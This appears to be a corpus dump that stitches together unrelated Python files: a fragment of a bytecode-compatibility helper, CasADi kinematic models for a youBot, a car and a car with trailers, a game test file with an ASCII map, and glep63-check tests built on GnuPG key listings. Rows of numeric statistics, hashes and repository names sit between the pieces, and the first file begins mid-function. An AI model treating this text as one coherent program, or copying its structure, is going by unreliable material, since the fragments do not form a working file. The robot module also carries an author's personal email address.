if isinstance(op, str):
op = ord(op)
return op
def freeze(self):
for field in "co_consts co_names co_varnames co_freevars co_cellvars".split():
val = getattr(self, field)
if isinstance(val, list):
setattr(self, field, tuple(val))
if isinstance(self.co_lnotab, dict):
d = self.co_lnotab
self.co_lnotab = sorted(zip(d.keys(), d.values()), key=lambda tup: tup[0])
if isinstance(self.co_lnotab, list):
# We assume we have a list of tuples:
# (offset, linenumber) which we convert
# into the encoded format
# FIXME: handle PYTHON 3
self.encode_lineno_tab()
if PYTHON3:
if hasattr(self, "co_kwonlyargcount"):
delattr(self, "co_kwonlyargcount")
return self
else:
args = (
self.co_argcount,
self.co_nlocals,
self.co_stacksize,
self.co_flags,
self.co_code,
self.co_consts,
self.co_names,
self.co_varnames,
self.co_filename,
self.co_name,
self.co_freevars,
self.co_cellvars,
)
return types.CodeType(*args)
def check(self):
for field in "co_argcount co_nlocals co_flags co_firstlineno".split():
val = getattr(self, field)
assert isinstance(val, int), "%s should be int, is %s" % (field, type(val))
for field in "co_consts co_names co_varnames".split():
val = getattr(self, field)
assert isinstance(val, tuple), "%s should be tuple, is %s" % (
field,
type(val),
)
def code2compat(co):
return Code2Compat(
co.co_argcount,
co.co_nlocals,
co.co_stacksize,
co.co_flags,
co.co_code,
co.co_consts,
co.co_names,
co.co_varnames,
co.co_filename,
co.co_name,
co.co_firstlineno,
co.co_lnotab,
co.co_freevars,
co.co_cellvars,
)
def iscode(obj):
"""A replacement for inspect.iscode() which we can't used because we may be
using a different version of Python than the version of Python used
in creating the byte-compiled objects. Here, the code types may mismatch.
"""
return inspect.iscode(obj) or isinstance(obj, Code3) or isinstance(obj, Code2)
def code_has_star_arg(code):
"""Return True iff
the code object has a variable positional parameter (*args-like)"""
return (code.co_flags & 4) != 0
def code_has_star_star_arg(code):
"""Return True iff
The code object has a variable keyword parameter (**kwargs-like)."""
return (code.co_flags & 8) != 0
| 32.359375
| 116
| 0.585997
| 2,612
| 20,710
| 4.42075
| 0.105666
| 0.099247
| 0.031177
| 0.023383
| 0.891487
| 0.863861
| 0.843596
| 0.842383
| 0.842383
| 0.842383
| 0
| 0.010072
| 0.338436
| 20,710
| 639
| 117
| 32.410016
| 0.832713
| 0.213858
| 0
| 0.902893
| 0
| 0
| 0.059753
| 0
| 0
| 0
| 0
| 0.004695
| 0.016529
| 1
| 0.059917
| false
| 0
| 0.004132
| 0.014463
| 0.123967
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e50c6a92bcbaedabf4b5c621dbc4b4f9e8da18b4
| 10,491
|
py
|
Python
|
carlike_w_trailers/robot_models.py
|
MohamedNaveed/Stochastic_Optimal_Control_algos
|
c89dcf4f312302bee963eeb34408d7a957f8bbcd
|
[
"MIT"
] | 2
|
2019-09-10T18:27:49.000Z
|
2020-03-26T13:23:22.000Z
|
carlike_w_trailers/robot_models.py
|
MohamedNaveed/Stochastic_Optimal_Control_algos
|
c89dcf4f312302bee963eeb34408d7a957f8bbcd
|
[
"MIT"
] | null | null | null |
carlike_w_trailers/robot_models.py
|
MohamedNaveed/Stochastic_Optimal_Control_algos
|
c89dcf4f312302bee963eeb34408d7a957f8bbcd
|
[
"MIT"
] | null | null | null |
# Author: Mohamed Naveed Gul Mohamed
# email:mohdnaveed96@gmail.com
# Date: Oct 11th 2019
#
# Dynamic models.
import casadi as c
import math as m
import numpy as np
class youBot_model(object):
"""
model specification and dynamics
"""
def __init__(self, length=0.58, breadth = 0.38, ang_vel_max=m.pi/6, vel_max=.8, dt=0.1, nx=3, nu=3):
self.length = length
self.breadth = breadth
self.ang_vel_max = ang_vel_max
#self.ang_accel_max = ang_accel_max
self.vel_max = vel_max
#self.accel_max = accel_max
self.dt = dt
self.nx = nx
self.nu = nu
self.A = c.DM.eye(self.nx) #youBot has a linear model
self.B = c.DM.eye(self.nu)*self.dt
self.G = c.DM.eye(self.nu)*self.dt
self.x = c.MX.sym('x', self.nx,1)
self.u = c.MX.sym('u', self.nu,1)
self.Sigma_w = c.DM([[self.vel_max**2,0,0],[0,self.vel_max**2,0],[0,0,self.ang_vel_max**2]])
def proc_model(self):
f = c.Function('f',[self.x,self.u],[self.x + self.u*self.dt])
A = c.Function('A',[self.x,self.u],[c.jacobian(f(self.x,self.u),self.x)]) #linearization
B = c.Function('B',[self.x,self.u],[c.jacobian(f(self.x,self.u),self.u)])
return f,A, B
def kinematics(self, state, vx, vy, vtheta, epsilon=0):
f,_,_ = self.proc_model()
#vx = vx + epsilon*self.vel_max*np.random.normal(0,1)
#vy = vy + epsilon*self.vel_max*np.random.normal(0,1)
#vtheta = vtheta + epsilon*self.ang_vel_max*np.random.normal(0,1)
w0 = epsilon*np.random.normal(0,np.sqrt(self.Sigma_w[0,0]))
w1 = epsilon*np.random.normal(0,np.sqrt(self.Sigma_w[1,1]))
w2 = epsilon*np.random.normal(0,np.sqrt(self.Sigma_w[2,2]))
w = c.DM([[w0],[w1],[w2]])
#state_n = state + self.dt*c.blockcat([[vx],[vy],[vtheta]])
state_n = f(state,c.blockcat([[vx],[vy],[vtheta]])) + c.mtimes(self.G,w)
state_n[2] = c.atan2(c.sin(state_n[2]),c.cos(state_n[2]))
return state_n
class car_model(object):
"""
model specification and dynamics
"""
def __init__(self, length=0.58, breadth = 0.38, ang_vel_max=m.pi/6, vel_max=.8, dt=0.1, nx=4, nu=2):
self.length = length
self.breadth = breadth
self.ang_vel_max = ang_vel_max
#self.ang_accel_max = ang_accel_max
self.vel_max = vel_max
#self.accel_max = accel_max
self.dt = dt
self.nx = nx
self.nu = nu
# self.A = c.DM.eye(self.nx) #youBot has a linear model
# self.B = c.DM.eye(self.nu)*self.dt
# self.G = c.DM.eye(self.nu)*self.dt
self.x = c.MX.sym('x', self.nx,1)
self.u = c.MX.sym('u', self.nu,1)
self.Sigma_w = c.DM([[self.vel_max**2,0],[0,self.ang_vel_max**2]])
def proc_model(self):
# f = c.Function('f',[self.x,self.u],[self.x[0] + self.u[0]*c.cos(self.x[2])*self.dt,
# self.x[1] + self.u[0]*c.sin(self.x[2])*self.dt,
# self.x[2] + self.u[0]*c.tan(self.x[3])*self.dt/self.length,
# self.x[3] + self.u[1]*self.dt])
g = c.MX(self.nx,self.nu)
g[0,0] = c.cos(self.x[2]); g[0,1] = 0;
g[1,0] = c.sin(self.x[2]); g[1,1] = 0;
g[2,0] = c.tan(self.x[3])/self.length; g[2,1] = 0
g[3,0] = 0; g[3,1] = 1;
# f = c.Function('f',[self.x,self.u],[self.x[0] + self.u[0]*c.cos(self.x[2])*self.dt,
# self.x[1] + self.u[0]*c.sin(self.x[2])*self.dt,
# self.x[2] + self.u[0]*c.tan(self.x[3])*self.dt/self.length,
# self.x[3] + self.u[1]*self.dt])
f = c.Function('f',[self.x,self.u],[self.x + c.mtimes(g,self.u)*self.dt])
# A = c.Function('A',[self.x,self.u],[c.jacobian(f(self.x,self.u)[0],self.x),
# c.jacobian(f(self.x,self.u)[1],self.x),
# c.jacobian(f(self.x,self.u)[2],self.x),
# c.jacobian(f(self.x,self.u)[3],self.x)]) #linearization
# B = c.Function('B',[self.x,self.u],[c.jacobian(f(self.x,self.u)[0],self.u),
# c.jacobian(f(self.x,self.u)[1],self.u),
# c.jacobian(f(self.x,self.u)[2],self.u),
# c.jacobian(f(self.x,self.u)[3],self.u)])
A = c.Function('A',[self.x,self.u],[c.jacobian(f(self.x,self.u),self.x)])
B = c.Function('B',[self.x,self.u],[c.jacobian(f(self.x,self.u),self.u)])
return f,A, B
def kinematics(self, state, U, epsilon=0):
f,_,_ = self.proc_model()
w0 = epsilon*np.random.normal(0,np.sqrt(self.Sigma_w[0,0]))
w1 = epsilon*np.random.normal(0,np.sqrt(self.Sigma_w[1,1]))
w = c.DM([[w0],[w1]])
#state_n = state + self.dt*c.blockcat([[vx],[vy],[vtheta]])
state_n = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))
# state_n = c.MX(self.nx,1)
# state_n[0] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[0]
# state_n[1] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[1]
# state_n[2] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[2]
# state_n[3] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[3]
state_n[2] = c.atan2(c.sin(state_n[2]),c.cos(state_n[2]))
return state_n
# def kinematics_DM(self, state, U, epsilon=0):
#
# f,_,_ = self.proc_model()
#
# w0 = epsilon*np.random.normal(0,np.sqrt(self.Sigma_w[0,0]))
# w1 = epsilon*np.random.normal(0,np.sqrt(self.Sigma_w[1,1]))
#
#
# w = c.DM([[w0],[w1]])
#
# #state_n = state + self.dt*c.blockcat([[vx],[vy],[vtheta]])
#
# state_n = c.DM(self.nx,1)
# state_n[0] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[0]
# state_n[1] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[1]
# state_n[2] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[2]
# state_n[3] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[3]
#
# state_n[2] = c.atan2(c.sin(state_n[2]),c.cos(state_n[2]))
#
# return state_n
class car_w_trailers(object):
"""
model specification and dynamics
"""
def __init__(self, length=0.58, breadth = 0.38, trailer_length = 0.3, ang_vel_max=m.pi/3, vel_max=3, dt=0.1, nx=6, nu=2):
self.length = length
self.breadth = breadth
self.trailer_length = trailer_length
self.ang_vel_max = ang_vel_max
#self.ang_accel_max = ang_accel_max
self.vel_max = vel_max
#self.accel_max = accel_max
self.dt = dt
self.nx = nx
self.nu = nu
# self.A = c.DM.eye(self.nx) #youBot has a linear model
# self.B = c.DM.eye(self.nu)*self.dt
# self.G = c.DM.eye(self.nu)*self.dt
self.x = c.MX.sym('x', self.nx,1)
self.u = c.MX.sym('u', self.nu,1)
self.Sigma_w = c.DM([[self.vel_max**2,0],[0,self.ang_vel_max**2]])
def proc_model(self):
# f = c.Function('f',[self.x,self.u],[self.x[0] + self.u[0]*c.cos(self.x[2])*self.dt,
# self.x[1] + self.u[0]*c.sin(self.x[2])*self.dt,
# self.x[2] + self.u[0]*c.tan(self.x[3])*self.dt/self.length,
# self.x[3] + self.u[1]*self.dt])
g = c.MX(self.nx,self.nu)
g[0,0] = c.cos(self.x[2]); g[0,1] = 0;
g[1,0] = c.sin(self.x[2]); g[1,1] = 0;
g[2,0] = c.tan(self.x[3])/self.length; g[2,1] = 0
g[3,0] = 0; g[3,1] = 1;
g[4,0] = c.sin(self.x[2] - self.x[4])/self.trailer_length; g[4,1] = 0
g[5,0] = c.cos(self.x[2] - self.x[4])*c.sin(self.x[4] - self.x[5])/self.trailer_length; g[5,1] = 0
# f = c.Function('f',[self.x,self.u],[self.x[0] + self.u[0]*c.cos(self.x[2])*self.dt,
# self.x[1] + self.u[0]*c.sin(self.x[2])*self.dt,
# self.x[2] + self.u[0]*c.tan(self.x[3])*self.dt/self.length,
# self.x[3] + self.u[1]*self.dt])
f = c.Function('f',[self.x,self.u],[self.x + c.mtimes(g,self.u)*self.dt])
# A = c.Function('A',[self.x,self.u],[c.jacobian(f(self.x,self.u)[0],self.x),
# c.jacobian(f(self.x,self.u)[1],self.x),
# c.jacobian(f(self.x,self.u)[2],self.x),
# c.jacobian(f(self.x,self.u)[3],self.x)]) #linearization
# B = c.Function('B',[self.x,self.u],[c.jacobian(f(self.x,self.u)[0],self.u),
# c.jacobian(f(self.x,self.u)[1],self.u),
# c.jacobian(f(self.x,self.u)[2],self.u),
# c.jacobian(f(self.x,self.u)[3],self.u)])
A = c.Function('A',[self.x,self.u],[c.jacobian(f(self.x,self.u),self.x)])
B = c.Function('B',[self.x,self.u],[c.jacobian(f(self.x,self.u),self.u)])
return f,A, B
def kinematics(self, state, U, epsilon=0):
f,_,_ = self.proc_model()
w0 = epsilon*np.random.normal(0,np.sqrt(self.Sigma_w[0,0]))
w1 = epsilon*np.random.normal(0,np.sqrt(self.Sigma_w[1,1]))
w = c.DM([[w0],[w1]])
#state_n = state + self.dt*c.blockcat([[vx],[vy],[vtheta]])
state_n = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))
# state_n = c.MX(self.nx,1)
# state_n[0] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[0]
# state_n[1] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[1]
# state_n[2] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[2]
# state_n[3] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[3]
state_n[2] = c.atan2(c.sin(state_n[2]),c.cos(state_n[2]))
state_n[4] = c.atan2(c.sin(state_n[4]),c.cos(state_n[4]))
state_n[5] = c.atan2(c.sin(state_n[5]),c.cos(state_n[5]))
return state_n
| 40.35
| 126
| 0.480793
| 1,816
| 10,491
| 2.693833
| 0.051211
| 0.098119
| 0.07359
| 0.081766
| 0.918438
| 0.912306
| 0.90045
| 0.88982
| 0.887163
| 0.864677
| 0
| 0.048299
| 0.299399
| 10,491
| 259
| 127
| 40.505792
| 0.617279
| 0.4725
| 0
| 0.762887
| 0
| 0
| 0.00278
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.092784
| false
| 0
| 0.030928
| 0
| 0.216495
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e53f9d2e35397e7176d7d35805829d01ef7cfb54
| 1,549
|
py
|
Python
|
test2/test_main.py
|
gr0mph/OceanOfCode
|
336caa00e22ae06e12d32971f84c82e3c0c9a3a4
|
[
"MIT"
] | null | null | null |
test2/test_main.py
|
gr0mph/OceanOfCode
|
336caa00e22ae06e12d32971f84c82e3c0c9a3a4
|
[
"MIT"
] | null | null | null |
test2/test_main.py
|
gr0mph/OceanOfCode
|
336caa00e22ae06e12d32971f84c82e3c0c9a3a4
|
[
"MIT"
] | null | null | null |
# Unittest
import unittest
import copy
WIDTH, HEIGHT = 15, 15
TREASURE_MAP = []
TREASURE_MAP.append(list('.xx.....xx.....'))
TREASURE_MAP.append(list('........xx.....'))
TREASURE_MAP.append(list('.xx............'))
TREASURE_MAP.append(list('.xx............'))
TREASURE_MAP.append(list('....xx.........'))
TREASURE_MAP.append(list('....xx.....xx..'))
TREASURE_MAP.append(list('...........xx..'))
TREASURE_MAP.append(list('...............'))
TREASURE_MAP.append(list('..........xx...'))
TREASURE_MAP.append(list('..........xx.xx'))
TREASURE_MAP.append(list('..........xx.xx'))
TREASURE_MAP.append(list('.....xx........'))
TREASURE_MAP.append(list('.....xx........'))
TREASURE_MAP.append(list('.....xx........'))
TREASURE_MAP.append(list('.....xx........'))
TEXT1 = 'MOVE N'
TEXT2 = 'SILENCE'
TEXT3 = 'TORPEDO 0 0|MOVE E'
TEXT4 = 'SURFACE 5'
TEXT5 = 'TORPEDO 11 1|MOVE N'
TEXT6 = 'MOVE N|SURFACE 5|TORPEDO 11 1|SILENCE'
MINE_MAP = []
MINE_MAP.append(list(' '))
MINE_MAP.append(list(' . . . . . . '))
MINE_MAP.append(list(' . . . '))
MINE_MAP.append(list(' . . . . . . '))
MINE_MAP.append(list(' '))
MINE_MAP.append(list(' '))
MINE_MAP.append(list(' . . . . . . '))
MINE_MAP.append(list(' . . . '))
MINE_MAP.append(list(' . . . . . . '))
MINE_MAP.append(list(' '))
MINE_MAP.append(list(' '))
MINE_MAP.append(list(' . . . . . . '))
MINE_MAP.append(list(' . . . '))
MINE_MAP.append(list(' . . . . . . '))
MINE_MAP.append(list(' '))
| 33.673913
| 47
| 0.524209
| 180
| 1,549
| 4.333333
| 0.155556
| 0.346154
| 0.5
| 0.403846
| 0.776923
| 0.776923
| 0.776923
| 0.776923
| 0.776923
| 0.776923
| 0
| 0.015516
| 0.16785
| 1,549
| 45
| 48
| 34.422222
| 0.589604
| 0.005165
| 0
| 0.560976
| 0
| 0
| 0.354776
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.04878
| 0
| 0.04878
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e552bba85f91e4cadcc2020d0f9a38227ddfb9fb
| 27,973
|
py
|
Python
|
tests/test_key_other.py
|
mgorny/glep63-check
|
820dd55e3c667edfaeff165cd990c121f436c108
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_key_other.py
|
mgorny/glep63-check
|
820dd55e3c667edfaeff165cd990c121f436c108
|
[
"BSD-2-Clause"
] | 4
|
2018-07-21T20:04:37.000Z
|
2019-05-06T12:26:56.000Z
|
tests/test_key_other.py
|
mgorny/glep63-check
|
820dd55e3c667edfaeff165cd990c121f436c108
|
[
"BSD-2-Clause"
] | 1
|
2018-07-21T19:54:38.000Z
|
2018-07-21T19:54:38.000Z
|
# glep63-check -- tests for other key issues
# (c) 2018-2019 Michał Górny
# Released under the terms of 2-clause BSD license.
import datetime
from glep63.base import (PublicKey, Key, UID, KeyAlgo, Validity,
KeyWarning, KeyIssue, SubKeyWarning)
import tests.key_base
class ExpiredKeyTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'other/expired-key.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:e:4096:1:DB44A8BC23B67AF4:946681246:946767646::-:::sc::::::23::0:
fpr:::::::::723AADD29743D410B5CAD9CEDB44A8BC23B67AF4:
uid:e::::946681246::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <nobody@gentoo.org>::::::::::0:
sub:e:4096:1:D4E7C940C84DD0DA:946681260:1545865383:::::s::::::23:
fpr:::::::::A23A271C81A008C088BB0A2CD4E7C940C84DD0DA:
'''
KEY = PublicKey(
validity=Validity.EXPIRED,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='DB44A8BC23B67AF4',
creation_date=datetime.datetime(1999, 12, 31, 23, 0, 46),
expiration_date=datetime.datetime(2000, 1, 1, 23, 0, 46),
key_caps='sc',
curve='',
subkeys=[
Key(
validity=Validity.EXPIRED,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='D4E7C940C84DD0DA',
creation_date=datetime.datetime(1999, 12, 31, 23, 1),
expiration_date=datetime.datetime(2018, 12, 26, 23, 3, 3),
key_caps='s',
curve='',
),
],
uids=[
UID(
validity=Validity.EXPIRED,
creation_date=datetime.datetime(1999, 12, 31, 23, 0, 46),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <nobody@gentoo.org>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyIssue(
key=KEY,
machine_desc='validity:expired',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyIssue(
key=KEY,
machine_desc='validity:expired',
long_desc='',
),
],
'glep63-1-strict': [
KeyIssue(
key=KEY,
machine_desc='validity:expired',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='validity:expired',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyIssue(
key=KEY,
machine_desc='validity:expired',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='validity:expired',
long_desc='',
),
],
}
class RevokedKeyTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'other/revoked-key.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:r:4096:1:CD407D01E7D00880:946682289:978218289::-:::sc::::::23::0:
fpr:::::::::F0769AC027B2117ECFAB7F1BCD407D01E7D00880:
uid:r::::946682289::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <nobody@gentoo.org>::::::::::0:
sub:r:4096:1:F9FDA2910B574DA4:946682301:978218301:::::s::::::23:
fpr:::::::::A76730D5141B96EFAA7B3E4AF9FDA2910B574DA4:
'''
KEY = PublicKey(
validity=Validity.REVOKED,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='CD407D01E7D00880',
creation_date=datetime.datetime(1999, 12, 31, 23, 18, 9),
expiration_date=datetime.datetime(2000, 12, 30, 23, 18, 9),
key_caps='sc',
curve='',
subkeys=[
Key(
validity=Validity.REVOKED,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='F9FDA2910B574DA4',
creation_date=datetime.datetime(1999, 12, 31, 23, 18, 21),
expiration_date=datetime.datetime(2000, 12, 30, 23, 18, 21),
key_caps='s',
curve='',
),
],
uids=[
UID(
validity=Validity.REVOKED,
creation_date=datetime.datetime(1999, 12, 31, 23, 18, 9),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <nobody@gentoo.org>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyIssue(
key=KEY,
machine_desc='validity:revoked',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyIssue(
key=KEY,
machine_desc='validity:revoked',
long_desc='',
),
],
'glep63-1-strict': [
KeyIssue(
key=KEY,
machine_desc='validity:revoked',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='validity:revoked',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyIssue(
key=KEY,
machine_desc='validity:revoked',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='validity:revoked',
long_desc='',
),
],
}
class NoSigningSubKeyTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'other/no-signing-subkey.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::scESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247212::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <nobody@gentoo.org>::::::::::0:
sub:-:4096:1:2D927DAC6A85C6BD:1533247212:1564783212:::::e::::::23:
fpr:::::::::F216FC6F6C4EC3AD4DE4A4AF2D927DAC6A85C6BD:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='scESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='2D927DAC6A85C6BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 12),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <nobody@gentoo.org>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-1-strict': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
}
class MultipurposeSubKeyTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'other/multipurpose-subkey.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247213::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <nobody@gentoo.org>::::::::::0:
sub:-:4096:1:2D927DAC6A85C6BD:1533247212:1564783212:::::es::::::23:
fpr:::::::::F216FC6F6C4EC3AD4DE4A4AF2D927DAC6A85C6BD:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='2D927DAC6A85C6BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 12),
key_caps='es',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 13),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <nobody@gentoo.org>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='subkey:multipurpose',
long_desc='',
),
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='subkey:multipurpose',
long_desc='',
),
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-1-strict': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='subkey:multipurpose',
long_desc='',
),
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-2': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='subkey:multipurpose',
long_desc='',
),
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-2-draft-20180707': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='subkey:multipurpose',
long_desc='',
),
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-2.1': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='subkey:multipurpose',
long_desc='',
),
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
KeyIssue(
key=KEY,
machine_desc='subkey:none:e',
long_desc='',
),
],
}
class NoEncryptionSubKeyTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'other/no-encryption-subkey.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cSC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247213::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <nobody@gentoo.org>::::::::::0:
sub:-:4096:1:2D927DAC6A85C6BD:1533247212:1564783212:::::s::::::23:
fpr:::::::::F216FC6F6C4EC3AD4DE4A4AF2D927DAC6A85C6BD:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cSC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='2D927DAC6A85C6BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 12),
key_caps='s',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 13),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <nobody@gentoo.org>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [],
'glep63-1-rsa2048-ec25519': [],
'glep63-1-strict': [],
'glep63-2': [],
'glep63-2-draft-20180707': [],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:e',
long_desc='',
),
],
}
class RevokedGentooUIDTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'other/revoked-gentoo-uid.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247215::5D26637AF3E9C4C07D3971B0BFC9D8AB2C3F8CA3::GLEP63 test key <nobody@example.com>::::::::::0:
